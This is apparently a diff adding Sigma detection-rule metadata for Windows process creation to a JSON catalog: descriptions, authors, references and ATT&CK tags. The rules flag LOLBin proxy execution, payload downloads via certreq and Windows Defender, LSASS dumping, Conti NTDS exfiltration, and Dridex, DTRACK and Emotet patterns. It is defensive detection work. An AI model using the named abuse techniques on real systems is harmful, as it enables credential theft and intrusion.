"filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml" + ], + "tags": [ + "attack.t1218.011", + "attack.defense_evasion" + ] + }, + "uuid": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", + "value": "Rundll32 InstallScreenSaver Execution" + }, + { + "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/01", + "falsepositive": [ + "Legitimate use when App-v is deployed" + ], + "filename": "proc_creation_win_lolbin_scriptrunner.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420", + "value": "Use of Scriptrunner.exe" + }, + { + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "meta": { + "author": "Anton Kutepov, oscd.community", + "creation_date": "2020/02/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_settingsynchost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" + ] + }, + "uuid": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "value": "Using SettingSyncHost.exe as LOLBin" + }, + { + "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_sftp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "value": "Use Of The SFTP.EXE Binary As A LOLBIN" + }, + { + "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_sideload_link_binary.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1560732860935729152", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "value": "Sideloading Link.EXE" + }, + { + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_sigverif.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", + "https://twitter.com/0gtweet/status/1457676633809330184", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "value": "Suspicious Sigverif Execution" + }, + { + "description": "The \"Squirrel.exe\" binary that is part of multiple software (Slack, Teams, Discord...etc) can be used as a LOLBIN", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/09", + "falsepositive": [ + "See rule (fa4b21c9-0057-4493-b289-2556416ae4d7) for possible FPs" + ], + "filename": "proc_creation_win_lolbin_squirrel.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "45239e6a-b035-4aaf-b339-8ad379fcb67e", + "value": "Use of Squirrel.exe" + }, + { + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/06", + "falsepositive": [ + "Legitimate use of the UI Accessibility Checker" + ], + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", + "https://twitter.com/bohops/status/1477717351017680899?s=12", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "0f6da907-5854-4be6-859a-e9958747b0aa", + "value": "Suspicious LOLBIN AccCheckConsole" + }, + { + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "meta": { + "author": "Mateusz Wydra, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Legitimate, non-default assistive technology applications execution" + ], + "filename": "proc_creation_win_lolbin_susp_atbroker.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", + "value": "Suspicious Atbroker Execution" + }, + { + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certreq/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "value": "Suspicious Certreq Command to Download" + }, + { + "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", + "meta": { + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "creation_date": "2021/09/30", + "falsepositive": [ + "Pnputil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", + "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", + "value": "Suspicious Driver Install by pnputil.exe" + }, + { + "description": "Detects execution of of Dxcap.exe", + "meta": { + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (update)", + "creation_date": "2019/10/26", + "falsepositive": [ + "Legitimate execution of dxcap.exe by legitimate user" + ], + "filename": "proc_creation_win_lolbin_susp_dxcap.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", + "https://twitter.com/harr0ey/status/992008180904419328", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "60f16a96-db70-42eb-8f76-16763e333590", + "value": "Application Whitelisting Bypass via Dxcap.exe" + }, + { + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_susp_grpconv.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1526833181831200770", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "value": "Suspicious GrpConv Execution" + }, + { + "description": "Detect the use of Windows Defender to download payloads", + "meta": { + "author": "Matthew Matchen", + "creation_date": "2020/09/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", + "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5", + "value": "Windows Defender Download Activity" + }, + { + "description": "Detects process dump via legitimate sqldumper.exe binary", + "meta": { + "author": "Kirill Kiryanov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate MSSQL Server actions" + ], + "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/countuponsec/status/910977826853068800", + "https://twitter.com/countuponsec/status/910969424215232518", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "value": "Dumping Process via Sqldumper.exe" + }, + { + "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN", + "meta": { + "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", + "creation_date": "2020/10/05", + "falsepositive": [ + "Automation and orchestration scripts may use this method execute scripts etc", + "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" + ], + "filename": "proc_creation_win_lolbin_susp_wsl.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", + "https://twitter.com/nas_bench/status/1535431474429808642", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", + "value": "WSL Execution" + }, + { + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/12", + "falsepositive": [ + "App-V clients" + ], + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code" + }, + { + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "meta": { + "author": "frack113", + "creation_date": "2021/07/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1216" + ] + }, + "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code" + }, + { + "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "meta": { + "author": "frack113", + "creation_date": "2022/05/16", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_lolbin_ttdinject.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", + "value": "Use of TTDInject.exe" + }, + { + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate usage by software developers/testers" + ], + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://twitter.com/mattifestation/status/1196390321783025666", + "https://twitter.com/oulusoyum/status/1191329746069655553", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ] + }, + "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "value": "Time Travel Debugging Utility Usage" + }, + { + "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_utilityfunctions.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "0403d67d-6227-4ea8-8145-4e72db7da120", + "value": "UtilityFunctions.ps1 Proxy Dll" + }, + { + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/01", + "falsepositive": [ + "Legitimate testing of Microsoft UI parts." + ], + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", + "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "value": "Use of VisualUiaVerifyNative.exe" + }, + { + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/07", + "falsepositive": [ + "Utilization of this tool should not be seen in enterprise environment" + ], + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Vbc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ] + }, + "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "value": "Visual Basic Command Line Compiler Usage" + }, + { + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "value": "Use of VSIISExeLauncher.exe" + }, + { + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/01", + "falsepositive": [ + "Legitimate use by a software developer" + ], + "filename": "proc_creation_win_lolbin_wfc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "value": "Use of Wfc.exe" + }, + { + "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", + "meta": { + "author": "Nasreddine Bencherchali, Victor Sergeev, oscd.community", + "creation_date": "2022/05/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_winword.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", + "https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "value": "Winword LOLBIN Usage" + }, + { + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "meta": { + "author": "frack113, manasmbellani", + "creation_date": "2022/02/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_wlrmdr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", + "value": "Wlrmdr Lolbin Use as Launcher" + }, + { + "description": "Detects Too long PowerShell command lines", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_long_powershell_commandline.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", + "value": "Too Long PowerShell Commandlines" + }, + { + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lsass_dump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", + "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", + "value": "LSASS Memory Dumping" + }, + { + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mailboxexport_share.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "value": "Suspicious PowerShell Mailbox Export to Share" + }, + { + "description": "Detects a command used by conti to find volume shadow backups", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_conti.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ] + }, + "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "value": "Conti Volume Shadow Listing" + }, + { + "description": "Detects a command used by conti to exfiltrate NTDS", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_conti_7zip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560" + ] + }, + "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "value": "Conti NTDS Exfiltration Command" + }, + { + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Some rare backup scenarios" + ], + "filename": "proc_creation_win_malware_conti_shadowcopy.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", + "value": "Sensitive Registry Access via Volume Shadow Copy" + }, + { + "description": "Detects typical Dridex process patterns", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2019/01/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_dridex.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dridex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" + ] + }, + "uuid": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "value": "Dridex Process Pattern" + }, + { + "description": "Detects specific process parameters as seen in DTRACK infections", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_dtrack.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/my-name-is-dtrack/93338/", + "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", + "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "value": "DTRACK Process Creation" + }, + { + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/09/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_emotet.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", + "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", + "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", + "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", + 